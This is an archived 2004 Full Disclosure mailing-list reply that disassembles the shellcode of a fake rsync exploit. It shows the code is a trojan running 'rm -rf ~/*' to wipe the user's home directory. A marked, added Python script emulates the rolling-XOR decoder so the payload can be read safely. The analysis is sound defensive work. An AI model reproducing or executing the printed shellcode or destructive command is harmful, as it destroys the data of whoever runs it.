Full Disclosure mailing list archives
Re: new rsync :) exploit rsync-too-open
From: Blue Boar <BlueBoar () thievco com>
Date: Fri, 28 May 2004 17:04:10 -0700
dkey wrote:
"nice mail"...but if somebody wants to use it, check the shellcode first...i think it deletes all your files in your home dir. i'm not sure, maybe somebody else can check it...
Yes.

seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 jmp short loc_12
seg000:00000002
seg000:00000002 ; =============== S U B R O U T I N E =======================================
seg000:00000002
seg000:00000002
seg000:00000002 sub_2 proc near ; CODE XREF: sub_2+10p
seg000:00000002 pop esi ; ESI = addr of decode section
seg000:00000003 xor ecx, ecx ; ECX = 0
seg000:00000005 mov cl, 75 ; loop 75 times
seg000:00000007 mov al, 255 ; XOR value start
seg000:00000009
seg000:00000009 decode_loop: ; CODE XREF: sub_2+Cj
seg000:00000009 xor [esi], al ; XOR current byte in decode section with AL
seg000:0000000B dec al ; AL = AL - 1
seg000:0000000D inc esi ; next byte
seg000:0000000E loop decode_loop
seg000:00000010 jmp short decoded
seg000:00000012 ; ---------------------------------------------------------------------------
seg000:00000012
seg000:00000012 loc_12: ; CODE XREF: seg000:00000000j
seg000:00000012 call sub_2 ; push addr of decode section
seg000:00000017
seg000:00000017 decoded: ; CODE XREF: sub_2+Ej
seg000:00000017 call loc_41 ; push addr of "\bin\sh"
seg000:00000017 ; ---------------------------------------------------------------------------
seg000:0000001C aBinSh db '/bin/sh',0
seg000:00000024 aSh db 'sh',0
seg000:00000027 aC db '-c',0
seg000:0000002A aRmRf2DevNull db 'rm -rf ~/* 2>/dev/null',0
seg000:00000041 ; ---------------------------------------------------------------------------
seg000:00000041
seg000:00000041 loc_41: ; CODE XREF: sub_2+15p
seg000:00000041 pop ebp ; EBP = addr of "\bin\sh"
seg000:00000042 xor eax, eax ; EAX = 0
seg000:00000042 sub_2 endp
seg000:00000042
seg000:00000044 push eax ; 0
seg000:00000045 lea ebx, [ebp+0Eh]
seg000:00000048 push ebx ; "'rm -rf ~/* 2>/dev/null"
seg000:00000049 lea ebx, [ebp+0Bh]
seg000:0000004C push ebx ; "-c"
seg000:0000004D lea ebx, [ebp+8]
seg000:00000050 push ebx ; "sh"
seg000:00000051 mov ebx, ebp ; "/bin/sh"
seg000:00000053 mov ecx, esp
seg000:00000055 xor edx, edx ; EDX = 0
seg000:00000057 mov al, 0Bh
seg000:00000059 int 80h ; LINUX - sys_execve
seg000:0000005B mov ebx, eax ; EBX = result
seg000:0000005D xor eax, eax
seg000:0000005F inc eax ; exit (1)
seg000:00000060 int 80h ; LINUX - sys_exit
seg000:00000060 seg000 ends
seg000:00000060 end
AKA "/bin/sh -c rm -rf ~/* 2>/dev/null"
BB
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
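The decoder in sub_2 above is a rolling-key XOR: every byte is XORed with AL, and AL is decremented after each byte, starting at 255 and running for 75 bytes. The following script is an added example, not code from the thread or from the posted exploit: it emulates that loop in Python and dumps the strings it unmasks, which is the kind of check dkey recommends doing before running anyone's shellcode. The encoded bytes are constructed here by applying the same transform to the four strings visible in the listing (padded with 0x90 filler); they are not the exploit's real bytes. It also shows why a single-byte XOR brute force, the usual first guess, does not recover this payload.

```python
# Added example (not from the original post): emulate the decode_loop in sub_2
# and list the strings it exposes, so the payload can be read without running it.
# The encoded bytes below are CONSTRUCTED from the strings in the listing;
# they are not the exploit's actual shellcode.

def xor_rolling(buf: bytes, count: int = 75, key_start: int = 0xFF) -> bytes:
    """Mirror of decode_loop: XOR byte i with AL, then AL = (AL - 1) mod 256,
    for `count` bytes. XOR is its own inverse, so the same routine encodes."""
    out = bytearray(buf)
    al = key_start
    for i in range(min(count, len(out))):
        out[i] ^= al
        al = (al - 1) & 0xFF          # `dec al` wraps at 8 bits, like the CPU
    return bytes(out)


def printable_strings(blob: bytes, min_len: int = 2) -> list:
    """Minimal `strings`: runs of printable ASCII at least min_len chars long."""
    found, cur = [], bytearray()
    for b in blob + b"\0":            # trailing NUL flushes the final run
        if 0x20 <= b < 0x7F:
            cur.append(b)
        else:
            if len(cur) >= min_len:
                found.append(cur.decode("ascii"))
            cur = bytearray()
    return found


# Constructed stand-in for the 75-byte decoded section: the four strings from
# the listing, padded with 0x90 filler to the length the loop processes.
PLAIN = b"/bin/sh\0sh\0-c\0rm -rf ~/* 2>/dev/null\0".ljust(75, b"\x90")
ENCODED = xor_rolling(PLAIN)         # what a reader of the exploit source sees


def recovered_strings(encoded: bytes = ENCODED) -> list:
    """Run the emulated decoder and report the strings it exposes."""
    return printable_strings(xor_rolling(encoded))


def single_byte_xor_strings(encoded: bytes = ENCODED, key: int = 0xFF) -> list:
    """What a naive 'XOR everything with one constant' guess yields instead:
    because the key changes per byte, a fixed key never recovers the command."""
    return printable_strings(bytes(b ^ key for b in encoded))


if __name__ == "__main__":
    print("decoded with rolling key :", recovered_strings())
    print("decoded with constant 0xFF:", single_byte_xor_strings())
```

Running the script prints the `/bin/sh`, `sh`, `-c` and `rm -rf ~/* 2>/dev/null` strings only from the rolling-key path; the constant-key path yields unrelated printable junk. To apply this to a real sample, replace `ENCODED` with the bytes that follow the `call sub_2` stub and keep `count` in sync with the value loaded into CL.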
Current thread:
- new rsync :) exploit rsync-too-open haxor (May 28)
- Re: new rsync :) exploit rsync-too-open phlox (May 28)
- Re: new rsync :) exploit rsync-too-open dkey (May 28)
- Re: new rsync :) exploit rsync-too-open Blue Boar (May 28)
- RE: new rsync :) exploit rsync-too-open listreader (May 30)
